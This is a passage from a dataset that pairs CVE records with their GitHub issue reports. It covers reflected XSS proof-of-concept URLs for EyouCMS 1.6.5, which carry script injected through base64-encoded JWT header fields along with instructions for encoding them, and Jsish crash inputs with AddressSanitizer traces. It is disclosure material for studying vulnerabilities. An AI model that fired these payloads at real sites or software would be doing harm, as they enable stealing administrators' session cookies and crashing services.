http://192.168.160.147/login.php?a=get_upload_list&c=Uploadimgnew&info=eyJudW0iOiIxXCI%2BPFNjUmlQdCA%2BYWxlcnQoOTc0NCk8L1NjUmlQdD4iLCJzaXplIjoiMjA5NzE1MiIsImlucHV0IjoiIiwiZnVuYyI6ImhlYWRfcGljX2NhbGxfYmFjayIsInBhdGgiOiJhbGxpbWciLCJpc193YXRlciI6IjEiLCJhbGciOiJIUzI1NiJ9&lang=cn&m=admin&unneed_syn= ![image](https://github.com/weng-xianhu/eyoucms/assets/66168888/4f8dc574-c907-4b25-963d-a3ddfe9198be) ![image](https://github.com/weng-xianhu/eyoucms/assets/66168888/d09bbaf6-c0c4-4b58-9ca9-dcba2f82da58) **In Header, when the `input` parameter causes a reflected XSS vulnerability, the payload is:** http://192.168.160.147/login.php?a=get_upload_list&c=Uploadimgnew&info=eyJudW0iOiIxIiwic2l6ZSI6IjIwOTcxNTIiLCJpbnB1dCI6IlwiPjxTY1JpUHQgPmFsZXJ0KDk3NDUpPC9TY1JpUHQ%2BIiwiZnVuYyI6ImhlYWRfcGljX2NhbGxfYmFjayIsInBhdGgiOiJhbGxpbWciLCJpc193YXRlciI6IjEiLCJhbGciOiJIUzI1NiJ9&lang=cn&m=admin&unneed_syn= ![image](https://github.com/weng-xianhu/eyoucms/assets/66168888/c3703b1c-5048-4b71-8592-37154f6e6e40) ![image](https://github.com/weng-xianhu/eyoucms/assets/66168888/54cf66e7-851f-4c9e-ae92-5731771fb786) **In Header, when the `path` parameter causes a reflected XSS vulnerability, the payload is:** http://192.168.160.147/login.php?a=get_upload_list&c=Uploadimgnew&info=eyJudW0iOiIxIiwic2l6ZSI6IjIwOTcxNTIiLCJpbnB1dCI6IiIsImZ1bmMiOiJoZWFkX3BpY19jYWxsX2JhY2siLCJwYXRoIjoiYWxsaW1nXCI%2BPFNjUmlQdCA%2BYWxlcnQoOTc0Nyk8L1NjUmlQdD4iLCJpc193YXRlciI6IjEiLCJhbGciOiJIUzI1NiJ9&lang=cn&m=admin&unneed_syn= ![image](https://github.com/weng-xianhu/eyoucms/assets/66168888/f823013c-2f1b-4ff7-89d8-d4d087fc4b73) ![image](https://github.com/weng-xianhu/eyoucms/assets/66168888/8780b450-b4af-47a2-a8b9-ab6325fef35d) **In Header, when the `func` parameter causes a reflected XSS vulnerability, the payload is:** http://192.168.160.147/login.php?a=get_upload_list&c=Uploadimgnew&info=eyJudW0iOiIxIiwic2l6ZSI6IjIwOTcxNTIiLCJpbnB1dCI6IiIsImZ1bmMiOiJoZWFkX3BpY19jYWxsX2JhY2tcIj48U2NSaVB0ID5hbGVydCg5NzQ2KTwvU2NSaVB0PiIsInBhdGgiOiJhbGxpbWciLCJpc193YXRlciI6IjEiLCJhbGciOiJIUzI1NiJ9&lang=cn&m=admin&unneed_syn= ![image](https://github.com/weng-xianhu/eyoucms/assets/66168888/b66d332d-d839-4a78-82e1-58b581b6c63f) ![image](https://github.com/weng-xianhu/eyoucms/assets/66168888/3eac7adb-2bed-4615-bf46-68d64516a357) **In Header, when the `is_water` parameter causes a reflected XSS vulnerability, the payload is:** http://192.168.160.147/login.php?a=get_upload_list&c=Uploadimgnew&info=eyJudW0iOiIxIiwic2l6ZSI6IjIwOTcxNTIiLCJpbnB1dCI6IiIsImZ1bmMiOiJoZWFkX3BpY19jYWxsX2JhY2siLCJwYXRoIjoiYWxsaW1nIiwiaXNfd2F0ZXIiOiIxXCI%2BPFNjUmlQdCA%2BYWxlcnQoOTc0OCk8L1NjUmlQdD4iLCJhbGciOiJIUzI1NiJ9&lang=cn&m=admin&unneed_syn= ![image](https://github.com/weng-xianhu/eyoucms/assets/66168888/fe40e3d7-fab9-4ace-b72c-90748c51be61) ![image](https://github.com/weng-xianhu/eyoucms/assets/66168888/94ab81bc-369d-4f72-876f-02f0c43f398c) ### **Impact** An administrator who is already logged in can have a cookie stolen after accessing the malicious url.
EyouCMS-V1.6.5 has multiple reflective XSS vulnerabilities
https://api.github.com/repos/weng-xianhu/eyoucms/issues/57/comments
1
2024-01-05T08:05:47Z
2024-03-22T01:36:04Z
https://github.com/weng-xianhu/eyoucms/issues/57
2,066,903,491
57
[ -0.040661998093128204, 0.007006400730460882, -0.012313023209571838, 0.015115584246814251, 0.0817883238196373, 0.006061158608645201, 0.008764219470322132, 0.01719677448272705, -0.00969287846237421, 0.016997776925563812, 0.02668236382305622, 0.005754369311034679, 0.010546913370490074, -0.020...
1,109
This is a GitHub Issue repo:eyoucms owner:weng-xianhu Title : EyouCMS-V1.6.5 has multiple reflective XSS vulnerabilities Issue date: --- start body --- ### **Summary** EyouCMS-V1.6.5 When uploading images locally, the program will use the info parameter to set the parameters carried by the upload form. Multiple reflective XSS vulnerabilities can be created by modifying the JWT encrypted HEADER of the accepted JSON data and setting the parameter it contains to a malicious value. These parameters are: `num`,`input`,`path`,`func`,`is_water` ![image](https://github.com/weng-xianhu/eyoucms/assets/66168888/2c764b74-2d99-42c7-a339-5d7ee84893bb) _There is no update on github, the latest installation package (V1.6.5) is: https://qiniu.eyoucms.com/source/EyouCMS-V1.6.5-UTF8-SP1_1221.zip_ ### **Details** The exploit of this XSS vulnerability is mainly to construct the form to carry parameters, header is directly referenced by `<input>` into the page. The info parameter should be replaced with a "+" if it contains a "-" after JWT encryption. The guess is that the developer may have incorrectly implemented the logic of URL encoding and decoding, resulting in accepting only "+" and not "-". This may be because they only consider standard URL encoding rules and ignore URL security encoding rules. ### **POC** HEADER:ALGORITHM & TOKEN TYPE: ``` { "num": "1", "size": "2097152", "input": "", "func": "head_pic_call_back", "path": "allimg", "is_water": "1'\"()&%<zzz><ScRiPt >alert(9240)</ScRiPt>", "alg": "HS256" } ``` **Note: you do not need to carry data when encrypting, just encrypt the corresponding parameter of the header, replace "-" with "+", and then perform url encoding.Don't go in the wrong order, or you'll convert the + to a space.** **In Header, when the `num` parameter causes a reflected XSS vulnerability, the payload is:** http://192.168.160.147/login.php?a=get_upload_list&c=Uploadimgnew&info=eyJudW0iOiIxXCI%2BPFNjUmlQdCA%2BYWxlcnQoOTc0NCk8L1NjUmlQdD4iLCJzaXplIjoiMjA5NzE1MiIsImlucHV0IjoiIiwiZnVuYyI6ImhlYWRfcGljX2NhbGxfYmFjayIsInBhdGgiOiJhbGxpbWciLCJpc193YXRlciI6IjEiLCJhbGciOiJIUzI1NiJ9&lang=cn&m=admin&unneed_syn= ![image](https://github.com/weng-xianhu/eyoucms/assets/66168888/4f8dc574-c907-4b25-963d-a3ddfe9198be) ![image](https://github.com/weng-xianhu/eyoucms/assets/66168888/d09bbaf6-c0c4-4b58-9ca9-dcba2f82da58) **In Header, when the `input` parameter causes a reflected XSS vulnerability, the payload is:** http://192.168.160.147/login.php?a=get_upload_list&c=Uploadimgnew&info=eyJudW0iOiIxIiwic2l6ZSI6IjIwOTcxNTIiLCJpbnB1dCI6IlwiPjxTY1JpUHQgPmFsZXJ0KDk3NDUpPC9TY1JpUHQ%2BIiwiZnVuYyI6ImhlYWRfcGljX2NhbGxfYmFjayIsInBhdGgiOiJhbGxpbWciLCJpc193YXRlciI6IjEiLCJhbGciOiJIUzI1NiJ9&lang=cn&m=admin&unneed_syn= ![image](https://github.com/weng-xianhu/eyoucms/assets/66168888/c3703b1c-5048-4b71-8592-37154f6e6e40) ![image](https://github.com/weng-xianhu/eyoucms/assets/66168888/54cf66e7-851f-4c9e-ae92-5731771fb786) **In Header, when the `path` parameter causes a reflected XSS vulnerability, the payload is:** http://192.168.160.147/login.php?a=get_upload_list&c=Uploadimgnew&info=eyJudW0iOiIxIiwic2l6ZSI6IjIwOTcxNTIiLCJpbnB1dCI6IiIsImZ1bmMiOiJoZWFkX3BpY19jYWxsX2JhY2siLCJwYXRoIjoiYWxsaW1nXCI%2BPFNjUmlQdCA%2BYWxlcnQoOTc0Nyk8L1NjUmlQdD4iLCJpc193YXRlciI6IjEiLCJhbGciOiJIUzI1NiJ9&lang=cn&m=admin&unneed_syn= ![image](https://github.com/weng-xianhu/eyoucms/assets/66168888/f823013c-2f1b-4ff7-89d8-d4d087fc4b73) ![image](https://github.com/weng-xianhu/eyoucms/assets/66168888/8780b450-b4af-47a2-a8b9-ab6325fef35d) **In Header, when the `func` parameter causes a reflected XSS vulnerability, the payload is:** http://192.168.160.147/login.php?a=get_upload_list&c=Uploadimgnew&info=eyJudW0iOiIxIiwic2l6ZSI6IjIwOTcxNTIiLCJpbnB1dCI6IiIsImZ1bmMiOiJoZWFkX3BpY19jYWxsX2JhY2tcIj48U2NSaVB0ID5hbGVydCg5NzQ2KTwvU2NSaVB0PiIsInBhdGgiOiJhbGxpbWciLCJpc193YXRlciI6IjEiLCJhbGciOiJIUzI1NiJ9&lang=cn&m=admin&unneed_syn= ![image](https://github.com/weng-xianhu/eyoucms/assets/66168888/b66d332d-d839-4a78-82e1-58b581b6c63f) ![image](https://github.com/weng-xianhu/eyoucms/assets/66168888/3eac7adb-2bed-4615-bf46-68d64516a357) **In Header, when the `is_water` parameter causes a reflected XSS vulnerability, the payload is:** http://192.168.160.147/login.php?a=get_upload_list&c=Uploadimgnew&info=eyJudW0iOiIxIiwic2l6ZSI6IjIwOTcxNTIiLCJpbnB1dCI6IiIsImZ1bmMiOiJoZWFkX3BpY19jYWxsX2JhY2siLCJwYXRoIjoiYWxsaW1nIiwiaXNfd2F0ZXIiOiIxXCI%2BPFNjUmlQdCA%2BYWxlcnQoOTc0OCk8L1NjUmlQdD4iLCJhbGciOiJIUzI1NiJ9&lang=cn&m=admin&unneed_syn= ![image](https://github.com/weng-xianhu/eyoucms/assets/66168888/fe40e3d7-fab9-4ace-b72c-90748c51be61) ![image](https://github.com/weng-xianhu/eyoucms/assets/66168888/94ab81bc-369d-4f72-876f-02f0c43f398c) ### **Impact** An administrator who is already logged in can have a cookie stolen after accessing the malicious url. --- end body --- comments : --- start comments --- --- end comments ---
5,000
CVE-2024-24267
2024-02-05T18:15:52.427
gpac v2.2.1 was discovered to contain a memory leak via the gfio_blob variable in the gf_fileio_from_blob function.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ] }
[ { "source": "cve@mitre.org", "tags": null, "url": "https://github.com/gpac/gpac/commit/d28d9ba45cf4f628a7b2c351849a895e6fcf2234" }, { "source": "cve@mitre.org", "tags": null, "url": "https://github.com/gpac/gpac/issues/2571" }, { "source": "cve@mitre.org", "tags": [ "Ex...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:2.2.1:*:*:*:*:*:*:*", "matchCriteriaId": "81FBED81-2989-4E6D-83CF-BF8E4989F5ED", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": ...
null
[ "gpac", "gpac" ]
Issue
Memory leak in function [gf_fileio_from_mem](https://github.com/gpac/gpac/blob/941a0891b989f5ad86b739cfb12c84b7e62e8ee4/src/utils/os_file.c#L1447) The memory leak is reported by a static analyzer tool developed at CAST (https://www.linkedin.com/company/cast-center). Dynamic memory is allocated [here](https://github.com/gpac/gpac/blob/941a0891b989f5ad86b739cfb12c84b7e62e8ee4/src/utils/os_file.c#L1450) if `gf_fileio_new` fails, function will return from [here](https://github.com/gpac/gpac/blob/941a0891b989f5ad86b739cfb12c84b7e62e8ee4/src/utils/os_file.c#L1455) and allocated memory will remain not freed.
Memory leak in function gf_fileio_from_mem
https://api.github.com/repos/gpac/gpac/issues/2571/comments
0
2023-08-29T11:13:38Z
2023-08-29T13:47:19Z
https://github.com/gpac/gpac/issues/2571
1,871,446,973
2,571
[ -0.04677533730864525, 0.008337270468473434, -0.011563902720808983, -0.037247028201818466, -0.002102363621816039, 0.020153816789388657, -0.006456873379647732, 0.04541827365756035, -0.02761765941977501, 0.023791899904608727, -0.006041814107447863, 0.0006243929965421557, 0.019951701164245605, ...
1,110
This is a GitHub Issue repo:gpac owner:gpac Title : Memory leak in function gf_fileio_from_mem Issue date: --- start body --- Memory leak in function [gf_fileio_from_mem](https://github.com/gpac/gpac/blob/941a0891b989f5ad86b739cfb12c84b7e62e8ee4/src/utils/os_file.c#L1447) The memory leak is reported by a static analyzer tool developed at CAST (https://www.linkedin.com/company/cast-center). Dynamic memory is allocated [here](https://github.com/gpac/gpac/blob/941a0891b989f5ad86b739cfb12c84b7e62e8ee4/src/utils/os_file.c#L1450) if `gf_fileio_new` fails, function will return from [here](https://github.com/gpac/gpac/blob/941a0891b989f5ad86b739cfb12c84b7e62e8ee4/src/utils/os_file.c#L1455) and allocated memory will remain not freed. --- end body --- comments : --- start comments --- --- end comments ---
813
CVE-2024-24186
2024-02-07T14:15:52.870
Jsish v3.5.0 (commit 42c694c) was discovered to contain a stack-overflow via the component IterGetKeysCallback at /jsish/src/jsiValue.c.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ] }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Vendor Advisory" ], "url": "https://github.com/pcmacdon/jsish/issues/98" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:jsish:jsish:3.5.0:*:*:*:*:*:*:*", "matchCriteriaId": "E97897F2-55BD-40DD-9F33-7980D892A505", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding"...
[ "Exploit", "Vendor Advisory" ]
[ "pcmacdon", "jsish" ]
Issue
###### Jsish revision Commit: https://github.com/pcmacdon/jsish/commit/42c694c152f7f4fbee34d5e14be37d6e0d09673f Version: v3.5.0 ###### Build platform Ubuntu 20.04.5 LTS (Linux 5.4.0-144-generic x86_64) ###### Build steps ```sh export JSI__SANITIZE=1 make ``` ###### Test case <details><summary>testcase</summary> <p> ```javascript var a = { length : 3 } ; a. length = 10 ; a. foo = [ ] ; a [ 0 ] = " bar " ; [ " bar " ] ; a [ 3 ] = null ; Object. setPrototypeOf ( Object. getPrototypeOf ( a ), Array. prototype ) ; Object. setPrototypeOf ( a, String. prototype ) ; var r ; Object. keys ( a ) ; var t = Object. keys ( a ). length ; var l = 1 ; r = " vieraıra " + l + " straır ". substring ( - 50 ) ; r [ 2 ] = r [ 2 ] ( 0, 15 ) ; r [ 2 ] = r [ 2 ] ; r [ 0 ] = r [ 0 ] + 1 ; String ( r [ 3 ] ) && r [ 0 ] > l ; l = null ; l = l == null ; l = l || Boolean ( " " ) ; l ; ``` </p> </details> ```javascript // poc.js var a = { } ; Object. setPrototypeOf ( Object. getPrototypeOf ( a ), Array. prototype ) ; Object. keys ( a ) ; ``` ###### Execution steps & Output ``` $ ./jsish/jsish poc.js AddressSanitizer:DEADLYSIGNAL ================================================================= ==2355298==ERROR: AddressSanitizer: stack-overflow on address 0x7ffd839b9ff8 (pc 0x000000506531 bp 0x000000000000 sp 0x7ffd839ba000 T0) #0 0x506531 in IterGetKeysCallback ./jsish/src/jsiValue.c:1451 #1 0x617d46 in tree_inorder ./jsish/src/jsiTree.c:836:9 #2 0x617cbf in tree_inorder ./jsish/src/jsiTree.c:833:13 #3 0x617e1e in tree_inorder ./jsish/src/jsiTree.c:840:13 #4 0x617cbf in tree_inorder ./jsish/src/jsiTree.c:833:13 #5 0x617e1e in tree_inorder ./jsish/src/jsiTree.c:840:13 #6 0x617e1e in tree_inorder ./jsish/src/jsiTree.c:840:13 #7 0x617e1e in tree_inorder ./jsish/src/jsiTree.c:840:13 #8 0x61710f in Jsi_TreeWalk ./jsish/src/jsiTree.c:914:16 #9 0x4ff066 in Jsi_IterGetKeys ./jsish/src/jsiValue.c:1496:5 #10 0x4ff0e4 in Jsi_IterGetKeys ./jsish/src/jsiValue.c:1498:9 #11 0x4ff0e4 in Jsi_IterGetKeys ./jsish/src/jsiValue.c:1498:9 #12 0x4ff0e4 in Jsi_IterGetKeys ./jsish/src/jsiValue.c:1498:9 #13 0x4ff0e4 in Jsi_IterGetKeys ./jsish/src/jsiValue.c:1498:9 .... #244 0x4ff0e4 in Jsi_IterGetKeys ./jsish/src/jsiValue.c:1498:9 #245 0x4ff0e4 in Jsi_IterGetKeys ./jsish/src/jsiValue.c:1498:9 #246 0x4ff0e4 in Jsi_IterGetKeys ./jsish/src/jsiValue.c:1498:9 #247 0x4ff0e4 in Jsi_IterGetKeys ./jsish/src/jsiValue.c:1498:9 #248 0x4ff0e4 in Jsi_IterGetKeys ./jsish/src/jsiValue.c:1498:9 SUMMARY: AddressSanitizer: stack-overflow ./jsish/src/jsiValue.c:1451 in IterGetKeysCallback ==2355298==ABORTING ``` --- when executed in release mode ###### Outputs ``` Segmentation fault ``` Credits: @Ye0nny, @EJueon of the seclab-yonsei.
stack-overflow ./jsish/src/jsiValue.c:1451 in IterGetKeysCallback
https://api.github.com/repos/pcmacdon/jsish/issues/98/comments
0
2024-01-14T11:31:14Z
2024-01-14T11:31:14Z
https://github.com/pcmacdon/jsish/issues/98
2,080,689,779
98
[ -0.02638186886906624, 0.0014252443797886372, -0.001718458835966885, 0.013309704139828682, 0.020784813910722733, -0.017563167959451675, 0.0006620520143769681, 0.03076152503490448, -0.030019210651516914, -0.010407253168523312, -0.027064798399806023, 0.008833546191453934, 0.008061538450419903, ...
1,111
This is a GitHub Issue repo:jsish owner:pcmacdon Title : stack-overflow ./jsish/src/jsiValue.c:1451 in IterGetKeysCallback Issue date: --- start body --- ###### Jsish revision Commit: https://github.com/pcmacdon/jsish/commit/42c694c152f7f4fbee34d5e14be37d6e0d09673f Version: v3.5.0 ###### Build platform Ubuntu 20.04.5 LTS (Linux 5.4.0-144-generic x86_64) ###### Build steps ```sh export JSI__SANITIZE=1 make ``` ###### Test case <details><summary>testcase</summary> <p> ```javascript var a = { length : 3 } ; a. length = 10 ; a. foo = [ ] ; a [ 0 ] = " bar " ; [ " bar " ] ; a [ 3 ] = null ; Object. setPrototypeOf ( Object. getPrototypeOf ( a ), Array. prototype ) ; Object. setPrototypeOf ( a, String. prototype ) ; var r ; Object. keys ( a ) ; var t = Object. keys ( a ). length ; var l = 1 ; r = " vieraıra " + l + " straır ". substring ( - 50 ) ; r [ 2 ] = r [ 2 ] ( 0, 15 ) ; r [ 2 ] = r [ 2 ] ; r [ 0 ] = r [ 0 ] + 1 ; String ( r [ 3 ] ) && r [ 0 ] > l ; l = null ; l = l == null ; l = l || Boolean ( " " ) ; l ; ``` </p> </details> ```javascript // poc.js var a = { } ; Object. setPrototypeOf ( Object. getPrototypeOf ( a ), Array. prototype ) ; Object. keys ( a ) ; ``` ###### Execution steps & Output ``` $ ./jsish/jsish poc.js AddressSanitizer:DEADLYSIGNAL ================================================================= ==2355298==ERROR: AddressSanitizer: stack-overflow on address 0x7ffd839b9ff8 (pc 0x000000506531 bp 0x000000000000 sp 0x7ffd839ba000 T0) #0 0x506531 in IterGetKeysCallback ./jsish/src/jsiValue.c:1451 #1 0x617d46 in tree_inorder ./jsish/src/jsiTree.c:836:9 #2 0x617cbf in tree_inorder ./jsish/src/jsiTree.c:833:13 #3 0x617e1e in tree_inorder ./jsish/src/jsiTree.c:840:13 #4 0x617cbf in tree_inorder ./jsish/src/jsiTree.c:833:13 #5 0x617e1e in tree_inorder ./jsish/src/jsiTree.c:840:13 #6 0x617e1e in tree_inorder ./jsish/src/jsiTree.c:840:13 #7 0x617e1e in tree_inorder ./jsish/src/jsiTree.c:840:13 #8 0x61710f in Jsi_TreeWalk ./jsish/src/jsiTree.c:914:16 #9 0x4ff066 in Jsi_IterGetKeys ./jsish/src/jsiValue.c:1496:5 #10 0x4ff0e4 in Jsi_IterGetKeys ./jsish/src/jsiValue.c:1498:9 #11 0x4ff0e4 in Jsi_IterGetKeys ./jsish/src/jsiValue.c:1498:9 #12 0x4ff0e4 in Jsi_IterGetKeys ./jsish/src/jsiValue.c:1498:9 #13 0x4ff0e4 in Jsi_IterGetKeys ./jsish/src/jsiValue.c:1498:9 .... #244 0x4ff0e4 in Jsi_IterGetKeys ./jsish/src/jsiValue.c:1498:9 #245 0x4ff0e4 in Jsi_IterGetKeys ./jsish/src/jsiValue.c:1498:9 #246 0x4ff0e4 in Jsi_IterGetKeys ./jsish/src/jsiValue.c:1498:9 #247 0x4ff0e4 in Jsi_IterGetKeys ./jsish/src/jsiValue.c:1498:9 #248 0x4ff0e4 in Jsi_IterGetKeys ./jsish/src/jsiValue.c:1498:9 SUMMARY: AddressSanitizer: stack-overflow ./jsish/src/jsiValue.c:1451 in IterGetKeysCallback ==2355298==ABORTING ``` --- when executed in release mode ###### Outputs ``` Segmentation fault ``` Credits: @Ye0nny, @EJueon of the seclab-yonsei. --- end body --- comments : --- start comments --- --- end comments ---
3,133
CVE-2024-24188
2024-02-07T14:15:52.917
Jsish v3.5.0 was discovered to contain a heap-buffer-overflow in ./src/jsiUtils.c.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ] }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Vendor Advisory" ], "url": "https://github.com/pcmacdon/jsish/issues/100" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:jsish:jsish:3.5.0:*:*:*:*:*:*:*", "matchCriteriaId": "E97897F2-55BD-40DD-9F33-7980D892A505", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding"...
[ "Exploit", "Issue Tracking", "Vendor Advisory" ]
[ "pcmacdon", "jsish" ]
Issue
###### Jsish revision Commit: https://github.com/pcmacdon/jsish/commit/42c694c152f7f4fbee34d5e14be37d6e0d09673f Version: v3.5.0 ###### Build platform Ubuntu 20.04.5 LTS (Linux 5.4.0-144-generic x86_64) ###### Build steps ```sh export JSI__SANITIZE=1 make ``` ###### Test case <details><summary>testcase</summary> <p> ```javascript try { var a = " a aaaa ". repeat ( 1 + 100 << 16 ). split ( ) ; JSON. parse ( parse ( JSON. stringify ) ) ; } catch ( a ) { } JSON. stringify ( + a ) ; ``` </p> </details> ```javascript // poc.js try { var a = " a aaaa ". repeat ( 1 + 100 << 16 ). split ( ) ; } catch ( a ) { } ``` ###### Execution steps & Output ``` $ ./jsish/jsish poc.js max alloc exceeded 104857600Jsi_DSSetLength src/jsiDString.c:196 max alloc exceeded 211812358Jsi_DSSetLength src/jsiDString.c:196 ================================================================= ==3965184==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x7f2d8707c900 at pc 0x00000049123e bp 0x7ffefcbaf3e0 sp 0x7ffefcbaeba0 WRITE of size 52953081 at 0x7f2d8707c900 thread T0 #0 0x49123d in strcpy (./jsish/jsish+0x49123d) #1 0x5525eb in SplitChar ./jsish/src/jsiUtils.c:2061:5 #2 0x5525eb in Jsi_SplitStr ./jsish/src/jsiUtils.c:2315:16 #3 0x579c25 in StringSplitCmd ./jsish/src/jsiString.c:78:9 #4 0x5592da in jsi_FuncCallSub ./jsish/src/jsiProto.c:244:22 #5 0x78812a in jsiFunctionSubCall ./jsish/src/jsiEval.c:796:10 #6 0x766920 in jsiEvalFunction ./jsish/src/jsiEval.c:837:17 #7 0x766920 in jsiEvalCodeSub ./jsish/src/jsiEval.c:1269:25 #8 0x780f26 in jsi_evalcode ./jsish/src/jsiEval.c:2227:10 #9 0x78396f in jsi_evalStrFile ./jsish/src/jsiEval.c #10 0x74a726 in Jsi_EvalFile ./jsish/src/jsiEval.c:2729:12 #11 0x5176d5 in Jsi_Main ./jsish/src/jsiInterp.c:936:18 #12 0xdefaa3 in jsi_main ./jsish/src/main.c:47:26 #13 0x7f2d90778082 in __libc_start_main /build/glibc-wuryBv/glibc-2.31/csu/../csu/libc-start.c:308:16 #14 0x42c9bd in _start (./jsish/jsish+0x42c9bd) 0x7f2d8707c900 is located 0 bytes to the right of 100000000-byte region [0x7f2d8111e800,0x7f2d8707c900) allocated by thread T0 here: #0 0x4a5419 in realloc (./jsish/jsish+0x4a5419) #1 0x535f91 in Jsi_Realloc ./jsish/src/jsiUtils.c:47:15 SUMMARY: AddressSanitizer: heap-buffer-overflow (./jsish/jsish+0x49123d) in strcpy Shadow bytes around the buggy address: 0x0fe630e078d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0fe630e078e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0fe630e078f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0fe630e07900: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0fe630e07910: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x0fe630e07920:[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0fe630e07930: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0fe630e07940: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0fe630e07950: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0fe630e07960: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0fe630e07970: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==3965184==ABORTING ``` Credits: @Ye0nny, @EJueon of the seclab-yonsei.
heap-buffer-overflow in ./jsish/src/jsiUtils.c
https://api.github.com/repos/pcmacdon/jsish/issues/100/comments
0
2024-01-20T05:53:20Z
2024-01-20T05:53:20Z
https://github.com/pcmacdon/jsish/issues/100
2,091,916,967
100
[ -0.022208411246538162, -0.0038599641993641853, 0.0008728493703529239, 0.021220725029706955, 0.039420291781425476, -0.003694744547829032, -0.02409663423895836, 0.03053111769258976, -0.03323272988200188, 0.022949175909161568, -0.029369134455919266, -0.0021641943603754044, 0.019216302782297134,...
1,112
This is a GitHub Issue repo:jsish owner:pcmacdon Title : heap-buffer-overflow in ./jsish/src/jsiUtils.c Issue date: --- start body --- ###### Jsish revision Commit: https://github.com/pcmacdon/jsish/commit/42c694c152f7f4fbee34d5e14be37d6e0d09673f Version: v3.5.0 ###### Build platform Ubuntu 20.04.5 LTS (Linux 5.4.0-144-generic x86_64) ###### Build steps ```sh export JSI__SANITIZE=1 make ``` ###### Test case <details><summary>testcase</summary> <p> ```javascript try { var a = " a aaaa ". repeat ( 1 + 100 << 16 ). split ( ) ; JSON. parse ( parse ( JSON. stringify ) ) ; } catch ( a ) { } JSON. stringify ( + a ) ; ``` </p> </details> ```javascript // poc.js try { var a = " a aaaa ". repeat ( 1 + 100 << 16 ). split ( ) ; } catch ( a ) { } ``` ###### Execution steps & Output ``` $ ./jsish/jsish poc.js max alloc exceeded 104857600Jsi_DSSetLength src/jsiDString.c:196 max alloc exceeded 211812358Jsi_DSSetLength src/jsiDString.c:196 ================================================================= ==3965184==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x7f2d8707c900 at pc 0x00000049123e bp 0x7ffefcbaf3e0 sp 0x7ffefcbaeba0 WRITE of size 52953081 at 0x7f2d8707c900 thread T0 #0 0x49123d in strcpy (./jsish/jsish+0x49123d) #1 0x5525eb in SplitChar ./jsish/src/jsiUtils.c:2061:5 #2 0x5525eb in Jsi_SplitStr ./jsish/src/jsiUtils.c:2315:16 #3 0x579c25 in StringSplitCmd ./jsish/src/jsiString.c:78:9 #4 0x5592da in jsi_FuncCallSub ./jsish/src/jsiProto.c:244:22 #5 0x78812a in jsiFunctionSubCall ./jsish/src/jsiEval.c:796:10 #6 0x766920 in jsiEvalFunction ./jsish/src/jsiEval.c:837:17 #7 0x766920 in jsiEvalCodeSub ./jsish/src/jsiEval.c:1269:25 #8 0x780f26 in jsi_evalcode ./jsish/src/jsiEval.c:2227:10 #9 0x78396f in jsi_evalStrFile ./jsish/src/jsiEval.c #10 0x74a726 in Jsi_EvalFile ./jsish/src/jsiEval.c:2729:12 #11 0x5176d5 in Jsi_Main ./jsish/src/jsiInterp.c:936:18 #12 0xdefaa3 in jsi_main ./jsish/src/main.c:47:26 #13 0x7f2d90778082 in __libc_start_main /build/glibc-wuryBv/glibc-2.31/csu/../csu/libc-start.c:308:16 #14 0x42c9bd in _start 